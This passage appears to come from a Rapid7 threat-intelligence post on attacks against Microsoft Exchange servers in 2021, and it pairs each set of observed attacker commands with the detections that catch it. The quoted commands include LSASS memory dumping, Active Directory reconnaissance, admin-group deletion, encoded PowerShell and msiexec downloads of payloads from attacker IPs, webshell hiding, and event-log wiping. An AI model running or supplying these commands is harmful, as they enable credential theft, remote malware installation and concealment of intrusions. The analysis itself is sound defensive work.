vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.\n\n> \u201cRunning as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.\u201d \nSource: [Application Pool Identities](<https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities>)\n\nBecause this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>) and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim\u2019s environment.\n\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. These devices also commonly fall outside of standard patch management systems. Rapid7 has observed an increased speed between when a vulnerability is disclosed, to the creation and adoption of a working exploit being used en masse, which gives victims little time to test and deploy fixes while adhering to change control process for systems providing mission-critical services.\n\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold are simple [password spraying](<https://attack.mitre.org/techniques/T1110/003/>) attacks against systems that are providing remote access services to the public internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent vulnerabilities in [Citrix Netscaler](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), [Progress\u2019 Telerik](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>), and [Pulse Secure\u2019s Pulse Connect Secure](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>), to name a few.\n\nWhile the method of gaining a foothold in a victim\u2019s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. The reason for this is the methods used once inside a victim\u2019s systems rarely need to be changed, as they continue to be very effective for the attacker. The continued adoption of \u201cliving off the land\u201d techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.\n\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7\u2019s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our [Managed Detection and Response Security Operations Center](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) and [Incident Response](<https://www.rapid7.com/services/security-consulting/incident-response-services/>) teams to develop and update our detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s [Attacker Behavior Analytics](<https://docs.rapid7.com/insightidr/aba-detections>) to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of exploitation of unknown vulnerabilities and allows them to securely advance. \n\nLast, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even a single group may do it and have various different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.\n\n## HAFNIUM-related activity\n\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7\u2019s [Insight Agent](<https://docs.rapid7.com/insight-agent/>) from Feb. 27 through March 7 in 2021. It should be noted that the way the client used by the attacker to spawn processes through the China Chopper webshell has remained [virtually unchanged since at least 2013](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>). These command line arguments are quite distinct and easy to find in logs containing command line arguments. This means detections developed against these patterns have the potential for an effective lifespan for the better part of a decade.\n\n_Source: _[_The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)_](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>)\n\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that by default, IIS when configured for Microsoft Exchange\u2019s Outlook Web Access, it will have an environment variable and value set to the following:\n\n`APP_POOL_ID=MSExchangeOWAAppPool`\n\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with [InsightIDR\u2019s Attacker Behavior Analytics](<https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/>), the TIDE team was able to write a detection that would match anytime any process was executed where the child or parent environment variable and value matched this. This allowed us to not only find the already known use of China Chopper, but also several other attackers exploiting this vulnerability using different techniques. \n\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility [procdump64.exe](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>) against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as [mimikatz](<https://github.com/gentilkiwi/mimikatz>) to [extract passwords from the memory dump of this process](<https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump>). This enables this attacker to potentially come back to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is \u201cThisIsMyPassword1!\u201d, when forced to change, they will likely just increment the digit at the end to \u201cThisIsMyPassword2!\u201d. This makes it easy for attackers to guess the future passwords based on the predictability of human behavior.\n\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\n\nProcudmp.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:\n \n \n cmd /c cd /d C:\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n \n\nReconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&nltest\" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&tasklist&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&tasklist &echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Domain computers\" /do&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&tasklist /v&echo [S]&cd&echo [E]\n \n\nEnumeration of further information about specific processes on the victim system. The process smex_master.exe is from [Trend Micro\u2019s ScanMail](<https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html>) and unsecapp.exe is from [Microsoft Windows](<https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c>).\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]\n \n \n\nDeletion of groups in Active Directory using the net.exe command executed via China Chopper:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.google.com > C:\\windows\\temp\\b.log 2>&1&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&ping www.google.com&echo [S]&cd&echo [E]\n \n\nSecond-stage payload retrieval commands executed via China Chopper webshell:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]\n \n\nFilesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:\n \n \n \\cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&findstr Request \"\\\\<REDACTED_HOSTNAME>\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ErrorFF.aspx&echo\" [S]&cd&echo [E]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookEN.aspx'&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\TimeoutLogout.aspx'&echo [S]\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Net Command Deleting Exchange Admin Group\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\n## MITRE ATT&CK techniques observed in HAFNIUM-related activity\n\n * [T1003](<https://attack.mitre.org/techniques/T1003/>) \\- OS Credential Dumping\n * [T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) \\- OS Credential Dumping: LSASS Memory\n * [T1005](<https://attack.mitre.org/techniques/T1005>) \\- Data from Local System\n * [T1007](<https://attack.mitre.org/techniques/T1007>) \\- System Service Discovery\n * [T1033](<https://attack.mitre.org/techniques/T1033>) \\- System Owner/User Discovery\n * [T1041](<https://attack.mitre.org/techniques/T1041/>) \\- Exfiltration Over C2 Channel\n * [T1047](<https://attack.mitre.org/techniques/T1047>) \\- Windows Management Instrumentation\n * [T1057](<https://attack.mitre.org/techniques/T1057>) \\- Process Discovery\n * [T1059](<https://attack.mitre.org/techniques/T1059>) \\- Command and Scripting Interpreter\n * [T1059.003](<https://attack.mitre.org/techniques/T1059/003>) \\- Command and Scripting Interpreter: Windows Command Shell\n * [T1071](<https://attack.mitre.org/techniques/T1071>) \\- Application Layer Protocol\n * [T1071.001](<https://attack.mitre.org/techniques/T1071/001>) \\- Application Layer Protocol: Web Protocols\n * [T1074](<https://attack.mitre.org/techniques/T1074>) \\- Data Staged\n * [T1074.001](<https://attack.mitre.org/techniques/T1074/001>) \\- Data Staged: Local Data Staging\n * [T1083](<https://attack.mitre.org/techniques/T1083/>) \\- File and Directory Discovery\n * [T1087](<https://attack.mitre.org/techniques/T1087>) \\- Account Discovery\n * [T1087.001](<https://attack.mitre.org/techniques/T1087/001>) \\- Account Discovery: Local Account\n * [T1087.002](<https://attack.mitre.org/techniques/T1087/002>) \\- Account Discovery: Domain Account\n * [T1098](<https://attack.mitre.org/techniques/T1098>) \\- Account Manipulation\n * [T1105](<https://attack.mitre.org/techniques/T1105/>) \\- Ingress Tool Transfer\n * [T1190](<https://attack.mitre.org/techniques/T1190>) \\- Exploit Public-Facing Application\n * [T1203](<https://attack.mitre.org/techniques/T1203>) \\- Exploitation For Client Execution\n * [T1218](<https://attack.mitre.org/techniques/T1218>) \\- Signed Binary Proxy Execution\n * [T1218.007](<https://attack.mitre.org/techniques/T1218/007/>) \\- Signed Binary Proxy Execution: Msiexec\n * [T1505](<https://attack.mitre.org/techniques/T1505/>) \\- Server Software Component\n * [T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) \\- Server Software Component: Web Shell\n * [T1518](<https://attack.mitre.org/techniques/T1518>) \\- Software Discovery\n * [T1518.001](<https://attack.mitre.org/techniques/T1518/001>) \\- Software Discovery: Security Software Discovery\n * [T1531](<https://attack.mitre.org/techniques/T1531>) \\- Account Access Removal\n * [T1583](<https://attack.mitre.org/techniques/T1583>) \\- Acquire Infrastructure\n * [T1583.003](<https://attack.mitre.org/techniques/T1583/003>) \\- Acquire Infrastructure: Virtual Private Server\n * [T1587](<https://attack.mitre.org/techniques/T1587>) \\- Develop Capabilities\n * [T1587.001](<https://attack.mitre.org/techniques/T1587/001>) \\- Develop Capabilities: Malware\n * [T1587.004](<https://attack.mitre.org/techniques/T1587/004>) \\- Develop Capabilities: Exploits\n * [T1588](<https://attack.mitre.org/techniques/T1588>) \\- Obtain Capabilities\n * [T1588.001](<https://attack.mitre.org/techniques/T1588/001>) \\- Obtain Capabilities: Malware\n * [T1588.002](<https://attack.mitre.org/techniques/T1588/002>) \\- Obtain Capabilities: Tool\n * [T1588.005](<https://attack.mitre.org/techniques/T1588/005>) \\- Obtain Capabilities: Exploits\n * [T1588.006](<https://attack.mitre.org/techniques/T1588/006>) \\- Obtain Capabilities: Vulnerabilities\n * [T1595](<https://attack.mitre.org/techniques/T1595>) \\- Active Scanning\n * [T1595.001](<https://attack.mitre.org/techniques/T1595/001>) \\- Active Scanning: Scanning IP Blocks\n * [T1595.002](<https://attack.mitre.org/techniques/T1595/002>) \\- Active Scanning: Vulnerability Scanning\n\n## Non-HAFNIUM-related activity\n\nRapid7 has also observed several additional distinct types of post-exploitation activity of these Exchange vulnerabilities in recent weeks by several other attackers other than HAFNIUM. We have grouped these and distilled the unique type of commands being executed into the individual sections shown below.\n\n### Minidump and Makecab attacker\n\nThis attacker was seen uploading batch scripts to execute the Microsoft utility [dsquery.exe](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952\\(v=ws.11\\)>) to enumerate all users from the Active Directory domain. The attacker would also use the [Minidump function in comsvcs.dll](<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll>) with rundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then uses the existing Microsoft utility [makecab.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab>) to compress the memory dump for more efficient retrieval. Overall, this attacker has some similarities in the data targeted for collection from victims to those discussed in others reporting on the actor known as HAFNIUM. However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.\n \n \n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n dsquery * -limit 0 -filter objectCategory=person -attr * -uco\n powershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 900 c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Minidump via COM Services DLL\n\n### Malicious DLL attacker\n\nThis attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have similar functionality to mimikatz or other hash/password dumping utilities. The attacker also made use of the net, netstat, and tasklist utilities, along with [klist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist>), in order to display cached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but the methods to do so differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.\n \n \n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c net time /do\n net time /do\n c:\\windows\\system32\\cmd.exe /c rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n c:\\windows\\system32\\cmd.exe /c klist\n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c netstat -ano\n netstat -ano\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Opera Browser and Cobalt Strike attacker\n\nThis attacker was seen using common techniques to download scripts with Microsoft\u2019s [BITSAdmin](<https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool>). These scripts would then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser that has a known DLL search order vulnerability ([CVE-2018-18913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913>)). The attacker would also retrieve malicious DLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This would then load the malicious code in the DLL located in the same directory as the browser. The eventual end of this execution would result in the execution of [Cobalt Strike](<https://www.cobaltstrike.com/>), a favorite tool of attackers that distributes ransomware:\n \n \n C:\\Windows\\System32\\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\\Users\\public\\2.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\Users\\public\\2.bat\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA\n msiexec.exe -k\n powershell Start-Sleep -Seconds 10\n cmd /c C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\\users\\public\\opera\\opera_browser.png')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\\users\\public\\opera\\opera_browser.dll')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\\users\\public\\opera\\opera_browser.exe')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Download And Execute With Background Intelligent Transfer Service\n * Attacker Technique - URL Passed To BitsAdmin\n\n### Six-character webshell attacker\n\nThis attacker was seen uploading webshells and copying them to other locations within the webroot.\n \n \n cmd /c copy C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_6_CHARACTER_STRING>.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Encoded PowerShell download cradle attacker\n\nThis attacker was seen executing encoded PowerShell commands that would download malware from a remote location. The would also execute the [getmac.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac>) utility to enumerate information about the network adapters.\n \n \n cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==\n C:\\Windows\\system32\\getmac.exe /FO CSV\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - PowerShell Download Cradles\n\n### Ten-character webshell attacker\n\nThis attacker was seen uploading webshells, using icacls to set the directory permissions of the webroot to be read-only recursively. Additionally, the attacker would use the attrib.exe utility to set the file containing the webshell to be marked as hidden and system to make finding these more difficult.\n \n \n C:\\Windows\\System32\\cmd.exe /c move \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\error.aspx\" \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\"\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n C:\\Windows\\System32\\cmd.exe /c =attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Modification Of Files In Exchange Webroot\n\n### 7zip and NetSupport Manager attacker\n\nThis attacker used the [7zip](<https://www.7-zip.org/>) compression utility (renamed to MonitoringLog.exe) and the [NetSupport Manager](<https://www.netsupportsoftware.com/remote-control/>) remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and located within a password-protected archive named Service.Information.rtf. Once extracted, these utilities were executed:\n \n \n c:\\windows\\system32\\cmd.exe dir C:\\Programdata\\\n c:\\windows\\system32\\cmd.exe /c powershell C:\\Programdata\\script1.ps1\n powershell C:\\Programdata\\script1.ps1\n C:\\ProgramData\\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\\ProgramData\\Service.Information.rtf -oC:\\ProgramData\n ping -n 10 127.0.0.1\n c:\\windows\\system32\\cmd.exe /c C:\\Programdata\\MonitoringLog.cmd\n taskkill /Im rundll32.exe /F\n C:\\ProgramData\\NetConnections\\client32.exe\n ping -n 10 127.0.0.1\n taskkill /Im rundll32.exe /F\n c:\\windows\\system32\\cmd.exe /c tasklist /v\n tasklist /v\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Event log deletion and virtual directory creation attacker\n\nThis attacker created virtual directories within the existing webroot using the Microsoft utility [appcmd.exe](<https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe>), and then cleared all event logs on the system using [wevtutl.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil>):\n \n \n CMD C:\\Windows\\System32\\inetsrv\\appcmd.exe add vdir \"/app.name:Default Web Site/\" \"/path:/owa/auth/ /zfwqn\" /physicalPath:C:\\ProgramData\\COM\\zfwqn\n \n CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x\n wevtutil el\n wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Clearing Event Logs With WEvtUtil\n\n### Webshell enumeration attacker\n\nThis attacker was seen executing encoded PowerShell commands to use the [type](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type>) command to view the contents possible webshell files named outlooken.aspx seen used by HAFNIUM and other attackers. This could be someone looking to use the footholds placed by other attackers or even researchers using the same exploit to identify systems that have been successfully compromised based on the reported activity associated with HAFNIUM:\n \n \n cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA\n cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA\n \n\nBase64 decoded strings:\n \n \n 